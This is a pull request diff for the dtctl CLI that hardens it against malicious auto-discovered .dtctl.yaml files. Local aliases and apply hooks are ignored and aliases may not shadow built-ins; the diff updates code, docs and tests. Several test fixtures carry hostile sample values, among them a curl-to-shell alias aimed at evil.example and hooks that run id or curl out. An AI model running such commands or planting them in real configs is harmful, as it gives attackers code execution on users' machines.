### PR TITLE
fix(config): don't honor aliases/hooks from auto-discovered local config

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,9 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Security
+- **Auto-discovered local `.dtctl.yaml` no longer honors command aliases or apply hooks** — `dtctl` discovers a per-project `.dtctl.yaml` by walking up from the current working directory. Such a file is now treated as untrusted: command aliases and `pre-apply`/`post-apply` hooks defined in it are ignored (contexts, tokens, and other preferences are still honored), with a warning printed to stderr naming the config in effect. These keys can run external commands, so they are honored only from the global config (`~/.config/dtctl/config`) or a config passed explicitly with `--config`, which have stronger ownership expectations. As defense in depth, the built-in-command shadow guard — previously enforced only when an alias was created via `dtctl alias set`/`import` — is now also enforced at resolution time, so an alias written directly into any config file can never override a built-in such as `get`, `apply`, or `version`.
+
 ## [0.28.1] - 2026-05-29
 
 ### Fixed

--- a/cmd/alias_resolve.go
+++ b/cmd/alias_resolve.go
@@ -30,6 +30,20 @@ func resolveAlias(args []string, cfg *config.Config) ([]string, bool, error) {
 		return nil, false, nil
 	}
 
+	// Defense in depth: never let an alias shadow a real built-in command at
+	// resolution time. The built-in guard in SetAlias/ImportAliases only runs
+	// when an alias is created through dtctl; a hand-written config (e.g. a
+	// planted .dtctl.yaml) can still define an alias named after a built-in
+	// such as `get`, `apply`, or `version`. Refusing it here ensures the real
+	// command always wins regardless of where the alias came from. We warn and
+	// fall through to normal command dispatch rather than erroring out.
+	if isBuiltinCommand(name) {
+		fmt.Fprintf(os.Stderr,
+			"warning: ignoring alias %q because it shadows the built-in %q command\n",
+			name, name)
+		return nil, false, nil
+	}
+
 	// Shell alias: starts with !
 	if strings.HasPrefix(expansion, "!") {
 		shellCmd := expansion[1:]

--- a/cmd/alias_resolve.go
+++ b/cmd/alias_resolve.go
@@ -24,6 +24,13 @@ func resolveAlias(args []string, cfg *config.Config) ([]string, bool, error) {
 		return nil, false, nil
 	}
 
+	// Aliases from an auto-discovered local .dtctl.yaml are untrusted and never
+	// honored — they can run arbitrary commands. The warning is emitted once in
+	// execute() via cfg.IgnoredExecKeys(); here we simply decline to expand.
+	if cfg.IsLocal() {
+		return nil, false, nil
+	}
+
 	name := args[0]
 	expansion, ok := cfg.GetAlias(name)
 	if !ok {

--- a/cmd/alias_resolve_test.go
+++ b/cmd/alias_resolve_test.go
@@ -120,6 +120,42 @@ func TestResolveAlias(t *testing.T) {
 	}
 }
 
+// TestResolveAlias_BuiltinShadowGuard verifies the AI-36 defense-in-depth
+// guard: an alias whose name matches a real built-in command (e.g. one planted
+// in a hand-written config) is refused at resolution time so the built-in
+// always wins, regardless of whether it is a shell alias or a regular alias.
+func TestResolveAlias_BuiltinShadowGuard(t *testing.T) {
+	tests := []struct {
+		name    string
+		args    []string
+		aliases map[string]string
+	}{
+		{
+			name:    "shell alias shadowing builtin",
+			args:    []string{"get"},
+			aliases: map[string]string{"get": "!curl https://evil.example/x.sh | sh"},
+		},
+		{
+			name:    "regular alias shadowing builtin",
+			args:    []string{"apply"},
+			aliases: map[string]string{"apply": "delete workflow $1"},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			cfg := config.NewConfig()
+			cfg.Aliases = tt.aliases
+
+			gotArgs, gotShell, err := resolveAlias(tt.args, cfg)
+
+			require.NoError(t, err)
+			require.False(t, gotShell, "shadowing alias must not be treated as a shell alias")
+			require.Nil(t, gotArgs, "shadowing alias must not expand; the built-in must win")
+		})
+	}
+}
+
 func TestSplitCommand(t *testing.T) {
 	tests := []struct {
 		name  string

--- a/cmd/alias_resolve_test.go
+++ b/cmd/alias_resolve_test.go
@@ -1,6 +1,8 @@
 package cmd
 
 import (
+	"os"
+	"path/filepath"
 	"testing"
 
 	"github.com/stretchr/testify/require"
@@ -153,6 +155,46 @@ func TestResolveAlias_BuiltinShadowGuard(t *testing.T) {
 			require.False(t, gotShell, "shadowing alias must not be treated as a shell alias")
 			require.Nil(t, gotArgs, "shadowing alias must not expand; the built-in must win")
 		})
+	}
+}
+
+// TestResolveAlias_LocalConfigIgnored verifies the AI-36 fix: an alias defined
+// in an auto-discovered local .dtctl.yaml is never honored at resolution time,
+// even though the value is still present in the loaded struct.
+func TestResolveAlias_LocalConfigIgnored(t *testing.T) {
+	// NOT parallel: os.Chdir is process-global and races with other tests.
+	tmpDir := t.TempDir()
+	localConfigPath := filepath.Join(tmpDir, config.LocalConfigName)
+	content := `apiVersion: v1
+kind: Config
+current-context: c
+contexts:
+  - name: c
+    context:
+      environment: https://local.dt.com
+      token-ref: t
+aliases:
+  wf: "get workflows"
+  sh: "!curl https://evil.example/x.sh | sh"
+`
+	if err := os.WriteFile(localConfigPath, []byte(content), 0600); err != nil {
+		t.Fatalf("write local config: %v", err)
+	}
+
+	origWd, err := os.Getwd()
+	require.NoError(t, err)
+	defer func() { _ = os.Chdir(origWd) }()
+	require.NoError(t, os.Chdir(tmpDir))
+
+	cfg, err := config.Load()
+	require.NoError(t, err)
+	require.True(t, cfg.IsLocal(), "config must be recognized as local")
+
+	for _, arg := range []string{"wf", "sh"} {
+		gotArgs, gotShell, err := resolveAlias([]string{arg}, cfg)
+		require.NoError(t, err)
+		require.False(t, gotShell, "local alias %q must not expand as a shell alias", arg)
+		require.Nil(t, gotArgs, "local alias %q must not be honored", arg)
 	}
 }
 

--- a/cmd/root.go
+++ b/cmd/root.go
@@ -81,6 +81,17 @@ func execute() int {
 	// resolution (the real command will produce the proper error later).
 	spanArgs := os.Args[1:]
 	if cfg, err := config.Load(); err == nil {
+		// Security: warn when an auto-discovered local .dtctl.yaml carried
+		// code-execution keys (aliases / apply hooks) that were ignored. This
+		// makes adoption of an untrusted per-project config visible instead of
+		// silent. See config.Load / sanitizeLocal.
+		if cfg.StrippedExecKeys() {
+			fmt.Fprintf(os.Stderr,
+				"warning: ignoring aliases and hooks from local config %q "+
+					"(code-execution keys are only honored from the global config)\n",
+				cfg.LocalConfigPath())
+		}
+
 		// os.Args[0] is the binary name; work with os.Args[1:]
 		expanded, isShell, err := resolveAlias(os.Args[1:], cfg)
 		if err != nil {

--- a/cmd/root.go
+++ b/cmd/root.go
@@ -81,11 +81,11 @@ func execute() int {
 	// resolution (the real command will produce the proper error later).
 	spanArgs := os.Args[1:]
 	if cfg, err := config.Load(); err == nil {
-		// Security: warn when an auto-discovered local .dtctl.yaml carried
-		// code-execution keys (aliases / apply hooks) that were ignored. This
+		// Security: warn when an auto-discovered local .dtctl.yaml carries
+		// code-execution keys (aliases / apply hooks) that are ignored. This
 		// makes adoption of an untrusted per-project config visible instead of
-		// silent. See config.Load / sanitizeLocal.
-		if cfg.StrippedExecKeys() {
+		// silent. See config.Load / markLocal.
+		if cfg.IgnoredExecKeys() {
 			fmt.Fprintf(os.Stderr,
 				"warning: ignoring aliases and hooks from local config %q "+
 					"(code-execution keys are only honored from the global config)\n",

--- a/docs/site/_docs/configuration.md
+++ b/docs/site/_docs/configuration.md
@@ -122,6 +122,18 @@ Commit the file to version control without secrets -- each developer or CI syste
 2. `.dtctl.yaml` in the current directory or any parent (walks up to root)
 3. Global config (`~/.config/dtctl/config`)
 
+> **Security: local configs cannot run commands.** Because a `.dtctl.yaml` is
+> auto-discovered by walking up from your current directory, it is treated as
+> **untrusted** — the same threat model as a checked-out repo, an unpacked
+> tarball, or a shared work dir. dtctl therefore **ignores command aliases and
+> apply hooks** found in an auto-discovered local `.dtctl.yaml`, printing a
+> warning to stderr when it does. These code-execution keys are honored **only**
+> from the global config (`~/.config/dtctl/config`) or a config you point at
+> explicitly with `--config`. A local config may still define contexts, tokens,
+> and other preferences. As an additional safeguard, an alias can never shadow a
+> built-in command (e.g. `get`, `apply`, `version`) regardless of where it is
+> defined.
+
 ## Safety Levels
 
 Safety levels provide **client-side** protection against accidental destructive operations:
@@ -185,6 +197,14 @@ contexts:
 ```
 
 Per-context hooks take precedence over global hooks. The special value `"none"` disables the global hook for a specific context.
+
+> **Security: hooks are ignored in local configs.** Apply hooks are honored only
+> from the global config (`~/.config/dtctl/config`) or an explicit `--config`
+> file. Hooks defined in an auto-discovered local `.dtctl.yaml` (whether in
+> `preferences` or a context) are **ignored**, since a local config from an
+> untrusted working directory must not be able to run commands. dtctl prints a
+> warning to stderr when it strips them. See
+> [Config Search Order](#config-search-order).
 
 ### Hook Contract
 
@@ -305,6 +325,15 @@ Aliases cannot shadow built-in commands:
 dtctl alias set get "query 'fetch logs'"
 # Error: alias name "get" conflicts with built-in command
 ```
+
+This guard is also enforced at **resolution** time: even an alias written
+directly into a config file (bypassing `alias set`) can never override a
+built-in — dtctl ignores it and runs the real command, warning on stderr.
+
+Aliases are honored only from the global config or an explicit `--config` file.
+Aliases in an auto-discovered local `.dtctl.yaml` are **ignored** for security
+(see [Config Search Order](#config-search-order)), so `alias export` / `import`
+should target the global config, not a per-project file.
 
 ---
 

--- a/docs/site/_docs/configuration.md
+++ b/docs/site/_docs/configuration.md
@@ -203,8 +203,9 @@ Per-context hooks take precedence over global hooks. The special value `"none"` 
 > file. Hooks defined in an auto-discovered local `.dtctl.yaml` (whether in
 > `preferences` or a context) are **ignored**, since a local config from an
 > untrusted working directory must not be able to run commands. dtctl prints a
-> warning to stderr when it strips them. See
-> [Config Search Order](#config-search-order).
+> warning to stderr when it ignores them. (The hook values remain in the file
+> untouched — they are simply never executed — so editing the config elsewhere
+> never destroys them.) See [Config Search Order](#config-search-order).
 
 ### Hook Contract
 

--- a/pkg/config/config.go
+++ b/pkg/config/config.go
@@ -25,10 +25,12 @@ type Config struct {
 	// config was loaded from, if any. Empty when loaded from the global config
 	// or from an explicit --config file. Unexported so it is never serialized.
 	localPath string
-	// strippedExecKeys is true when code-execution keys (aliases and/or
-	// apply hooks) were present in an auto-discovered local config and were
-	// ignored for security. See sanitizeLocal.
-	strippedExecKeys bool
+	// ignoredExecKeys is true when code-execution keys (aliases and/or apply
+	// hooks) are present in an auto-discovered local config. Such keys are
+	// loaded into the struct (so they round-trip safely through save/edit) but
+	// are never honored at runtime — alias resolution and hook execution check
+	// IsLocal() and skip them. See markLocal, GetPreApplyHook, resolveAlias.
+	ignoredExecKeys bool
 }
 
 // NamedContext holds a context with its name
@@ -177,11 +179,13 @@ func findLocalConfigFrom(startDir string) string {
 //
 // Security: an auto-discovered local .dtctl.yaml is treated as untrusted (the
 // classic "untrusted working directory / checked-out repo / shared dir"
-// scenario). Code-execution keys — shell aliases and apply hooks — are stripped
-// from it via sanitizeLocal so a malicious config planted in (or above) the
-// current directory cannot silently run commands. These keys are only honored
-// from the global config or an explicit --config file (loaded via LoadFrom),
-// which carry stronger ownership expectations.
+// scenario). Code-execution keys — shell aliases and apply hooks — defined in
+// such a config are never honored: alias resolution and hook execution check
+// IsLocal() and skip them. These keys are honored only from the global config
+// or an explicit --config file (loaded via LoadFrom), which carry stronger
+// ownership expectations. The keys are still loaded into the struct (and never
+// mutated here) so that config-management commands round-trip the file without
+// silently destroying a user's own aliases or hooks.
 func Load() (*Config, error) {
 	// Check for local config first
 	localConfig := FindLocalConfig()
@@ -190,7 +194,7 @@ func Load() (*Config, error) {
 		if err != nil {
 			return nil, err
 		}
-		cfg.sanitizeLocal(localConfig)
+		cfg.markLocal(localConfig)
 		return cfg, nil
 	}
 
@@ -198,46 +202,50 @@ func Load() (*Config, error) {
 	return LoadFrom(DefaultConfigPath())
 }
 
-// sanitizeLocal marks the config as loaded from an auto-discovered local
-// .dtctl.yaml and strips any code-execution keys that must not be honored from
-// an untrusted per-project config: top-level shell/command aliases, the global
-// (preferences) apply hooks, and per-context apply hooks. It records via
-// strippedExecKeys whether any such key was actually present, so callers can
-// surface a one-line warning naming the local config in effect.
-func (c *Config) sanitizeLocal(path string) {
+// markLocal records that the config was loaded from an auto-discovered local
+// .dtctl.yaml and notes whether it carries any code-execution keys (top-level
+// aliases, global apply hooks, or per-context apply hooks). It does NOT mutate
+// those keys: the values are needed for safe round-tripping by edit/save
+// commands, and they are ignored at the point of use (resolveAlias,
+// GetPreApplyHook/GetPostApplyHook) rather than being stripped at load. The
+// recorded flag lets callers surface a one-line warning naming the local config
+// in effect.
+func (c *Config) markLocal(path string) {
 	c.localPath = path
+	c.ignoredExecKeys = c.hasExecKeys()
+}
 
-	stripped := false
+// hasExecKeys reports whether the config defines any code-execution key:
+// a top-level alias, a global (preferences) apply hook, or a per-context hook.
+func (c *Config) hasExecKeys() bool {
 	if len(c.Aliases) > 0 {
-		c.Aliases = nil
-		stripped = true
+		return true
 	}
 	if c.Preferences.Hooks.PreApply != "" || c.Preferences.Hooks.PostApply != "" {
-		c.Preferences.Hooks = Hooks{}
-		stripped = true
+		return true
 	}
 	for i := range c.Contexts {
 		h := c.Contexts[i].Context.Hooks
 		if h.PreApply != "" || h.PostApply != "" {
-			c.Contexts[i].Context.Hooks = Hooks{}
-			stripped = true
+			return true
 		}
 	}
-	c.strippedExecKeys = stripped
+	return false
 }
 
 // IsLocal reports whether the config was loaded from an auto-discovered local
 // .dtctl.yaml (as opposed to the global config or an explicit --config file).
+// Code-execution keys (aliases, apply hooks) are ignored when this is true.
 func (c *Config) IsLocal() bool { return c.localPath != "" }
 
 // LocalConfigPath returns the path of the auto-discovered local .dtctl.yaml the
 // config was loaded from, or "" if it was not loaded from a local config.
 func (c *Config) LocalConfigPath() string { return c.localPath }
 
-// StrippedExecKeys reports whether code-execution keys (aliases, apply hooks)
-// were present in the auto-discovered local config and were ignored for
-// security. See sanitizeLocal.
-func (c *Config) StrippedExecKeys() bool { return c.strippedExecKeys }
+// IgnoredExecKeys reports whether code-execution keys (aliases, apply hooks)
+// are present in the auto-discovered local config and are therefore ignored at
+// runtime. See markLocal.
+func (c *Config) IgnoredExecKeys() bool { return c.ignoredExecKeys }
 
 // LoadFrom loads the configuration from a specific path
 func LoadFrom(path string) (*Config, error) {
@@ -258,10 +266,11 @@ func LoadWithoutExpansion() (*Config, error) {
 		if err != nil {
 			return nil, err
 		}
-		// Strip code-execution keys from an auto-discovered local config here
-		// too, so callers that inspect raw values never observe (or act on)
-		// aliases/hooks from an untrusted working directory. See Load.
-		cfg.sanitizeLocal(local)
+		// Tag the local config so callers ignore its code-execution keys at the
+		// point of use, without mutating the loaded values (this path also
+		// backs config-management commands that load-modify-save the file). See
+		// Load.
+		cfg.markLocal(local)
 		return cfg, nil
 	}
 	return LoadFromWithoutExpansion(DefaultConfigPath())
@@ -655,6 +664,10 @@ func (c *Context) GetEffectiveSafetyLevel() SafetyLevel {
 // Per-context hooks take precedence over global (preferences) hooks.
 // The special value "none" explicitly disables the global hook for a context.
 func (c *Config) GetPreApplyHook() string {
+	// Hooks from an auto-discovered local config are untrusted and never run.
+	if c.IsLocal() {
+		return ""
+	}
 	// Per-context hook wins
 	if ctx, err := c.CurrentContextObj(); err == nil {
 		if ctx.Hooks.PreApply != "" {
@@ -672,6 +685,10 @@ func (c *Config) GetPreApplyHook() string {
 // Per-context hooks take precedence over global (preferences) hooks.
 // The special value "none" explicitly disables the global hook for a context.
 func (c *Config) GetPostApplyHook() string {
+	// Hooks from an auto-discovered local config are untrusted and never run.
+	if c.IsLocal() {
+		return ""
+	}
 	if ctx, err := c.CurrentContextObj(); err == nil {
 		if ctx.Hooks.PostApply != "" {
 			if ctx.Hooks.PostApply == "none" {

--- a/pkg/config/config.go
+++ b/pkg/config/config.go
@@ -20,6 +20,15 @@ type Config struct {
 	Tokens         []NamedToken      `yaml:"tokens"`
 	Preferences    Preferences       `yaml:"preferences"`
 	Aliases        map[string]string `yaml:"aliases,omitempty"`
+
+	// localPath is the path of the auto-discovered local .dtctl.yaml this
+	// config was loaded from, if any. Empty when loaded from the global config
+	// or from an explicit --config file. Unexported so it is never serialized.
+	localPath string
+	// strippedExecKeys is true when code-execution keys (aliases and/or
+	// apply hooks) were present in an auto-discovered local config and were
+	// ignored for security. See sanitizeLocal.
+	strippedExecKeys bool
 }
 
 // NamedContext holds a context with its name
@@ -165,16 +174,70 @@ func findLocalConfigFrom(startDir string) string {
 //  2. Global config (XDG_CONFIG_HOME/dtctl/config)
 //
 // If a local config is found, it is used exclusively (not merged with global).
+//
+// Security: an auto-discovered local .dtctl.yaml is treated as untrusted (the
+// classic "untrusted working directory / checked-out repo / shared dir"
+// scenario). Code-execution keys — shell aliases and apply hooks — are stripped
+// from it via sanitizeLocal so a malicious config planted in (or above) the
+// current directory cannot silently run commands. These keys are only honored
+// from the global config or an explicit --config file (loaded via LoadFrom),
+// which carry stronger ownership expectations.
 func Load() (*Config, error) {
 	// Check for local config first
 	localConfig := FindLocalConfig()
 	if localConfig != "" {
-		return LoadFrom(localConfig)
+		cfg, err := LoadFrom(localConfig)
+		if err != nil {
+			return nil, err
+		}
+		cfg.sanitizeLocal(localConfig)
+		return cfg, nil
 	}
 
 	// Fall back to global config
 	return LoadFrom(DefaultConfigPath())
 }
+
+// sanitizeLocal marks the config as loaded from an auto-discovered local
+// .dtctl.yaml and strips any code-execution keys that must not be honored from
+// an untrusted per-project config: top-level shell/command aliases, the global
+// (preferences) apply hooks, and per-context apply hooks. It records via
+// strippedExecKeys whether any such key was actually present, so callers can
+// surface a one-line warning naming the local config in effect.
+func (c *Config) sanitizeLocal(path string) {
+	c.localPath = path
+
+	stripped := false
+	if len(c.Aliases) > 0 {
+		c.Aliases = nil
+		stripped = true
+	}
+	if c.Preferences.Hooks.PreApply != "" || c.Preferences.Hooks.PostApply != "" {
+		c.Preferences.Hooks = Hooks{}
+		stripped = true
+	}
+	for i := range c.Contexts {
+		h := c.Contexts[i].Context.Hooks
+		if h.PreApply != "" || h.PostApply != "" {
+			c.Contexts[i].Context.Hooks = Hooks{}
+			stripped = true
+		}
+	}
+	c.strippedExecKeys = stripped
+}
+
+// IsLocal reports whether the config was loaded from an auto-discovered local
+// .dtctl.yaml (as opposed to the global config or an explicit --config file).
+func (c *Config) IsLocal() bool { return c.localPath != "" }
+
+// LocalConfigPath returns the path of the auto-discovered local .dtctl.yaml the
+// config was loaded from, or "" if it was not loaded from a local config.
+func (c *Config) LocalConfigPath() string { return c.localPath }
+
+// StrippedExecKeys reports whether code-execution keys (aliases, apply hooks)
+// were present in the auto-discovered local config and were ignored for
+// security. See sanitizeLocal.
+func (c *Config) StrippedExecKeys() bool { return c.strippedExecKeys }
 
 // LoadFrom loads the configuration from a specific path
 func LoadFrom(path string) (*Config, error) {
@@ -191,7 +254,15 @@ func LoadFromWithoutExpansion(path string) (*Config, error) {
 // using the same search order as Load (local config, then global config).
 func LoadWithoutExpansion() (*Config, error) {
 	if local := FindLocalConfig(); local != "" {
-		return LoadFromWithoutExpansion(local)
+		cfg, err := LoadFromWithoutExpansion(local)
+		if err != nil {
+			return nil, err
+		}
+		// Strip code-execution keys from an auto-discovered local config here
+		// too, so callers that inspect raw values never observe (or act on)
+		// aliases/hooks from an untrusted working directory. See Load.
+		cfg.sanitizeLocal(local)
+		return cfg, nil
 	}
 	return LoadFromWithoutExpansion(DefaultConfigPath())
 }

--- a/pkg/config/config_test.go
+++ b/pkg/config/config_test.go
@@ -813,6 +813,177 @@ contexts:
 	}
 }
 
+// TestLoad_LocalConfigStripsExecKeys verifies the AI-36 hardening: an
+// auto-discovered local .dtctl.yaml must never contribute code-execution keys
+// (shell aliases or apply hooks), and Load must flag that they were stripped.
+func TestLoad_LocalConfigStripsExecKeys(t *testing.T) {
+	// NOT parallel: os.Chdir is process-global and races with other tests.
+	tmpDir, err := os.MkdirTemp("", "dtctl-strip-exec-*")
+	if err != nil {
+		t.Fatalf("Failed to create temp dir: %v", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	localConfigPath := filepath.Join(tmpDir, LocalConfigName)
+	localContent := `apiVersion: v1
+kind: Config
+current-context: local-ctx
+contexts:
+  - name: local-ctx
+    context:
+      environment: https://local.dt.com
+      token-ref: local-token
+      hooks:
+        pre-apply: "bash -c 'id > /tmp/pwned'"
+        post-apply: "curl -s https://evil.example"
+preferences:
+  hooks:
+    pre-apply: "evil-global-pre"
+    post-apply: "evil-global-post"
+aliases:
+  version: "!echo PWNED > /tmp/pwned"
+  wf: "get workflows"
+`
+	if err := os.WriteFile(localConfigPath, []byte(localContent), 0600); err != nil {
+		t.Fatalf("Failed to write local config: %v", err)
+	}
+
+	origWd, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("Failed to get working directory: %v", err)
+	}
+	defer func() { _ = os.Chdir(origWd) }()
+
+	if err := os.Chdir(tmpDir); err != nil {
+		t.Fatalf("Failed to change directory: %v", err)
+	}
+
+	cfg, err := Load()
+	if err != nil {
+		t.Fatalf("Load() error = %v", err)
+	}
+
+	// Non-executable config is still honored.
+	if cfg.CurrentContext != "local-ctx" {
+		t.Errorf("CurrentContext = %q, want local-ctx", cfg.CurrentContext)
+	}
+
+	// Code-execution keys must be stripped.
+	if len(cfg.Aliases) != 0 {
+		t.Errorf("Aliases = %v, want empty (stripped from local config)", cfg.Aliases)
+	}
+	if _, ok := cfg.GetAlias("version"); ok {
+		t.Error("GetAlias(version) returned an alias; local aliases must be stripped")
+	}
+	if cfg.GetPreApplyHook() != "" {
+		t.Errorf("GetPreApplyHook() = %q, want empty (stripped)", cfg.GetPreApplyHook())
+	}
+	if cfg.GetPostApplyHook() != "" {
+		t.Errorf("GetPostApplyHook() = %q, want empty (stripped)", cfg.GetPostApplyHook())
+	}
+	if cfg.Preferences.Hooks != (Hooks{}) {
+		t.Errorf("Preferences.Hooks = %+v, want zero", cfg.Preferences.Hooks)
+	}
+
+	// Metadata for the caller-facing warning.
+	if !cfg.IsLocal() {
+		t.Error("IsLocal() = false, want true")
+	}
+	if !cfg.StrippedExecKeys() {
+		t.Error("StrippedExecKeys() = false, want true")
+	}
+	gotPath, _ := filepath.EvalSymlinks(cfg.LocalConfigPath())
+	wantPath, _ := filepath.EvalSymlinks(localConfigPath)
+	if gotPath != wantPath {
+		t.Errorf("LocalConfigPath() = %q, want %q", gotPath, wantPath)
+	}
+}
+
+// TestLoad_LocalConfigNoExecKeys verifies that a clean local config (no aliases
+// or hooks) loads without being flagged as stripped.
+func TestLoad_LocalConfigNoExecKeys(t *testing.T) {
+	// NOT parallel: os.Chdir is process-global and races with other tests.
+	tmpDir, err := os.MkdirTemp("", "dtctl-no-exec-*")
+	if err != nil {
+		t.Fatalf("Failed to create temp dir: %v", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	localConfigPath := filepath.Join(tmpDir, LocalConfigName)
+	localContent := `apiVersion: v1
+kind: Config
+current-context: local-ctx
+contexts:
+  - name: local-ctx
+    context:
+      environment: https://local.dt.com
+      token-ref: local-token
+`
+	if err := os.WriteFile(localConfigPath, []byte(localContent), 0600); err != nil {
+		t.Fatalf("Failed to write local config: %v", err)
+	}
+
+	origWd, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("Failed to get working directory: %v", err)
+	}
+	defer func() { _ = os.Chdir(origWd) }()
+
+	if err := os.Chdir(tmpDir); err != nil {
+		t.Fatalf("Failed to change directory: %v", err)
+	}
+
+	cfg, err := Load()
+	if err != nil {
+		t.Fatalf("Load() error = %v", err)
+	}
+
+	if !cfg.IsLocal() {
+		t.Error("IsLocal() = false, want true")
+	}
+	if cfg.StrippedExecKeys() {
+		t.Error("StrippedExecKeys() = true, want false (no exec keys present)")
+	}
+}
+
+// TestLoadFrom_ExplicitConfigKeepsExecKeys verifies that an explicit config
+// path (e.g. --config) is trusted and retains aliases/hooks; only
+// auto-discovered local configs are sanitized.
+func TestLoadFrom_ExplicitConfigKeepsExecKeys(t *testing.T) {
+	t.Parallel()
+	tmpDir := t.TempDir()
+	path := filepath.Join(tmpDir, "explicit-config.yaml")
+	content := `apiVersion: v1
+kind: Config
+aliases:
+  wf: "get workflows"
+preferences:
+  hooks:
+    pre-apply: "bash validate.sh"
+`
+	if err := os.WriteFile(path, []byte(content), 0600); err != nil {
+		t.Fatalf("Failed to write config: %v", err)
+	}
+
+	cfg, err := LoadFrom(path)
+	if err != nil {
+		t.Fatalf("LoadFrom() error = %v", err)
+	}
+
+	if cfg.IsLocal() {
+		t.Error("IsLocal() = true, want false for explicit config path")
+	}
+	if cfg.StrippedExecKeys() {
+		t.Error("StrippedExecKeys() = true, want false for explicit config path")
+	}
+	if _, ok := cfg.GetAlias("wf"); !ok {
+		t.Error("GetAlias(wf) missing; explicit config must retain aliases")
+	}
+	if cfg.Preferences.Hooks.PreApply != "bash validate.sh" {
+		t.Errorf("PreApply hook = %q, want retained", cfg.Preferences.Hooks.PreApply)
+	}
+}
+
 func TestConfig_DeleteContext(t *testing.T) {
 	t.Parallel()
 	tests := []struct {

--- a/pkg/config/config_test.go
+++ b/pkg/config/config_test.go
@@ -813,12 +813,15 @@ contexts:
 	}
 }
 
-// TestLoad_LocalConfigStripsExecKeys verifies the AI-36 hardening: an
-// auto-discovered local .dtctl.yaml must never contribute code-execution keys
-// (shell aliases or apply hooks), and Load must flag that they were stripped.
-func TestLoad_LocalConfigStripsExecKeys(t *testing.T) {
+// TestLoad_LocalConfigIgnoresExecKeys verifies the AI-36 hardening: an
+// auto-discovered local .dtctl.yaml must never have its code-execution keys
+// (shell aliases or apply hooks) honored. The values stay in the struct so
+// edit/save commands round-trip the file, but the honoring points
+// (GetPreApplyHook/GetPostApplyHook, and resolveAlias which checks IsLocal)
+// must treat them as absent. Load flags that such keys are being ignored.
+func TestLoad_LocalConfigIgnoresExecKeys(t *testing.T) {
 	// NOT parallel: os.Chdir is process-global and races with other tests.
-	tmpDir, err := os.MkdirTemp("", "dtctl-strip-exec-*")
+	tmpDir, err := os.MkdirTemp("", "dtctl-ignore-exec-*")
 	if err != nil {
 		t.Fatalf("Failed to create temp dir: %v", err)
 	}
@@ -868,29 +871,30 @@ aliases:
 		t.Errorf("CurrentContext = %q, want local-ctx", cfg.CurrentContext)
 	}
 
-	// Code-execution keys must be stripped.
-	if len(cfg.Aliases) != 0 {
-		t.Errorf("Aliases = %v, want empty (stripped from local config)", cfg.Aliases)
-	}
-	if _, ok := cfg.GetAlias("version"); ok {
-		t.Error("GetAlias(version) returned an alias; local aliases must be stripped")
-	}
+	// Code-execution keys are NOT honored: the effective hooks resolve to
+	// empty because the config is local.
 	if cfg.GetPreApplyHook() != "" {
-		t.Errorf("GetPreApplyHook() = %q, want empty (stripped)", cfg.GetPreApplyHook())
+		t.Errorf("GetPreApplyHook() = %q, want empty (local hooks not honored)", cfg.GetPreApplyHook())
 	}
 	if cfg.GetPostApplyHook() != "" {
-		t.Errorf("GetPostApplyHook() = %q, want empty (stripped)", cfg.GetPostApplyHook())
+		t.Errorf("GetPostApplyHook() = %q, want empty (local hooks not honored)", cfg.GetPostApplyHook())
 	}
-	if cfg.Preferences.Hooks != (Hooks{}) {
-		t.Errorf("Preferences.Hooks = %+v, want zero", cfg.Preferences.Hooks)
+
+	// ...but the raw values remain in the struct so a load-modify-save by a
+	// config-management command does not silently destroy the user's file.
+	if len(cfg.Aliases) != 2 {
+		t.Errorf("Aliases = %v, want both retained for round-trip safety", cfg.Aliases)
+	}
+	if cfg.Preferences.Hooks.PreApply != "evil-global-pre" {
+		t.Errorf("Preferences.Hooks.PreApply = %q, want retained for round-trip", cfg.Preferences.Hooks.PreApply)
 	}
 
 	// Metadata for the caller-facing warning.
 	if !cfg.IsLocal() {
 		t.Error("IsLocal() = false, want true")
 	}
-	if !cfg.StrippedExecKeys() {
-		t.Error("StrippedExecKeys() = false, want true")
+	if !cfg.IgnoredExecKeys() {
+		t.Error("IgnoredExecKeys() = false, want true")
 	}
 	gotPath, _ := filepath.EvalSymlinks(cfg.LocalConfigPath())
 	wantPath, _ := filepath.EvalSymlinks(localConfigPath)
@@ -899,8 +903,78 @@ aliases:
 	}
 }
 
+// TestLoad_LocalConfigRoundTripPreservesExecKeys is the regression guard for
+// the data-loss bug: loading a local config (which ignores exec keys) and
+// saving it back — as `dtctl config set`, `alias set`, `migrate-tokens`, etc.
+// do — must NOT wipe the user's own aliases or hooks from their file.
+func TestLoad_LocalConfigRoundTripPreservesExecKeys(t *testing.T) {
+	// NOT parallel: os.Chdir is process-global and races with other tests.
+	tmpDir, err := os.MkdirTemp("", "dtctl-roundtrip-*")
+	if err != nil {
+		t.Fatalf("Failed to create temp dir: %v", err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	localConfigPath := filepath.Join(tmpDir, LocalConfigName)
+	localContent := `apiVersion: v1
+kind: Config
+current-context: local-ctx
+contexts:
+  - name: local-ctx
+    context:
+      environment: https://local.dt.com
+      token-ref: local-token
+      hooks:
+        pre-apply: "echo ctx-hook"
+preferences:
+  hooks:
+    pre-apply: "echo global-hook"
+aliases:
+  wf: "get workflows"
+  prod: "get workflows --context prod"
+`
+	if err := os.WriteFile(localConfigPath, []byte(localContent), 0600); err != nil {
+		t.Fatalf("Failed to write local config: %v", err)
+	}
+
+	origWd, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("Failed to get working directory: %v", err)
+	}
+	defer func() { _ = os.Chdir(origWd) }()
+	if err := os.Chdir(tmpDir); err != nil {
+		t.Fatalf("Failed to change directory: %v", err)
+	}
+
+	// Simulate an unrelated config-management write: load, mutate something
+	// else, save back to the same local file.
+	cfg, err := Load()
+	if err != nil {
+		t.Fatalf("Load() error = %v", err)
+	}
+	cfg.Preferences.Editor = "vim"
+	if err := cfg.SaveTo(localConfigPath); err != nil {
+		t.Fatalf("SaveTo() error = %v", err)
+	}
+
+	// Reload raw from disk and confirm nothing was destroyed.
+	raw, err := LoadFromWithoutExpansion(localConfigPath)
+	if err != nil {
+		t.Fatalf("LoadFromWithoutExpansion() error = %v", err)
+	}
+	if len(raw.Aliases) != 2 {
